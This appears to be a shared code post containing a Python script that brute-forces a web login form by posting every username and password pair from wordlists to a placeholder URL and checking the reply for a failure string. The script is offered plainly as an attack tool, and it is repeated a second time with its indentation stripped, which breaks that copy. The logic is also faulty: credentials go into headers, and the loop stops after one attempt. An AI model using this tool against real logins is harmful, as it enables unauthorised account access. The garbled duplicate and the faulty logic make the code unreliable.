tanaka-geek · August 30, 2020 07:38
diff --git a/bruteforce.py b/bruteforce.py
 import requests
 import sys 

 #POST FORM password brute force script

 #Requirements are @location, @bad_chars, @df and hf for data and headers respectively
 #
 # The flow of program is    1 Do you have valid connection? check_connection() 
 #                           2 Open each file of usernames, passwords to brute force with
 #                           3 Brute Foce brute_force()
 #                           
 # 

 #@location
 url = "http://<IP>/index"

 #@bad_chars Such as "Information is incorrect!" to identify whether logon was successful or not 
 bad_chars = "incorrect"

 #@hf(header file) must be deliminated with ":" for each var:value
 hf = "headers.txt"
 #                            
 #                            Copy Request from BurpSuite 
 #                            And Make them separated yourself

 #@df(data file) must be deliminated with new line.
 uf ="usernames.txt"
 pf ="passwords.txt"


 #global headers 
 headers={}

 # Open File 
 def file_open(df):
    data = open(df,"r")
    elements = data.read().split('\n')

    return elements[:-1]

 def brute_force(usernames,passwords):
    # Brute Forcing :)
    for username in usernames:
        headers['user_name'] = username
        #print("[*]Trying username : %s" % username)
        for password in passwords:
            headers['user_password'] = password
            
            r = requests.post(url,headers)
            print("[*]Trying %s:%s" % (username,password))

            if bad_chars in r.text:
            	break
            else:
                print("[*]Password is found !")
                print("%s:%s" % (username, password))
                break

 def browser_headers(hf):
    df = open(hf,"r")

    lines = filter(lambda x: x != "", df.read().split("\n"))

    for i in lines:
        j = i.split(":")
        param = j[0]
        value = j[1]
        headers[param]=value
    return headers

 def check_connection():
    r = requests.post(url,headers)
    if r.status_code == 200:
        print("[*]Okay!")
 

 def main():



    #Make headers based on the text file
    browser_headers(hf)

    #Check connection
    check_connection()
    

    #Open files of usernames&passwords
    usernames = file_open(uf)
    passwords = file_open(pf)

    #Brute Force
    brute_force(usernames,passwords)


 main()
	import requests
	import sys

	#POST FORM password brute force script

	#Requirements are @location, @bad_chars, @df and hf for data and headers respectively
	#
	# The flow of program is 1 Do you have valid connection? check_connection()
	# 2 Open each file of usernames, passwords to brute force with
	# 3 Brute Foce brute_force()
	#
	#

	#@location
	url = "http://<IP>/index"

	#@bad_chars Such as "Information is incorrect!" to identify whether logon was successful or not
	bad_chars = "incorrect"

	#@hf(header file) must be deliminated with ":" for each var:value
	hf = "headers.txt"
	#
	# Copy Request from BurpSuite
	# And Make them separated yourself

	#@df(data file) must be deliminated with new line.
	uf ="usernames.txt"
	pf ="passwords.txt"


	#global headers
	headers={}

	# Open File
	def file_open(df):
	data = open(df,"r")
	elements = data.read().split('\n')

	return elements[:-1]

	def brute_force(usernames,passwords):
	# Brute Forcing :)
	for username in usernames:
	headers['user_name'] = username
	#print("[*]Trying username : %s" % username)
	for password in passwords:
	headers['user_password'] = password

	r = requests.post(url,headers)
	print("[*]Trying %s:%s" % (username,password))

	if bad_chars in r.text:
	break
	else:
	print("[*]Password is found !")
	print("%s:%s" % (username, password))
	break

	def browser_headers(hf):
	df = open(hf,"r")

	lines = filter(lambda x: x != "", df.read().split("\n"))

	for i in lines:
	j = i.split(":")
	param = j[0]
	value = j[1]
	headers[param]=value
	return headers

	def check_connection():
	r = requests.post(url,headers)
	if r.status_code == 200:
	print("[*]Okay!")


	def main():



	#Make headers based on the text file
	browser_headers(hf)

	#Check connection
	check_connection()


	#Open files of usernames&passwords
	usernames = file_open(uf)
	passwords = file_open(pf)

	#Brute Force
	brute_force(usernames,passwords)


	main()